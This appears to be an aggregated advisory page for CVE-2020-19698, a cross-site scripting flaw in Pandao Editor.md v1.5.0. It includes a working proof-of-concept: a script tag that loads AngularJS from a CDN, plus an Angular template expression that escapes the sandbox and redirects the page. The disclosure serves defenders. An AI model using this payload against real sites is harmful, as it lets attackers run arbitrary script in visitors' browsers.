Headline

CVE-2020-19698: XSS vulnerability found via <script> src attribute · Issue #700 · pandao/editor.md

Cross Site Scripting vulnerability found in Pandao Editor.md v.1.5.0 allows a remote attacker to execute arbitrary code via a crafted script to the editor parameter.

2 years ago

CVE

Open in Source

#xss #vulnerability #google #js #java

Description:
User can use <script> src attribute to include external library(ex: angularjs), and then, execute malicious javascript codes.

<script src=https://ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.min.js> 
</script>
<div ng-app >
    {{constructor.constructor(&#34;window.location.replace(&#39;&#104;ttp://www.bing.com&#39;)&#34;)()}} 
</div>

Actual Results
The malicious codes are executed and page redirected to bing.com
(The PoC is to display alert, but it can be changed to window.location.replace() for page redirection

Cross-site Scripting vulnerability found in Pandao Editor.md v.1.5.0 allows a remote attacker to execute arbitrary code via a crafted script to the `editor` parameter.

2 years ago

ghsa

Open in Source

#xss #vulnerability #git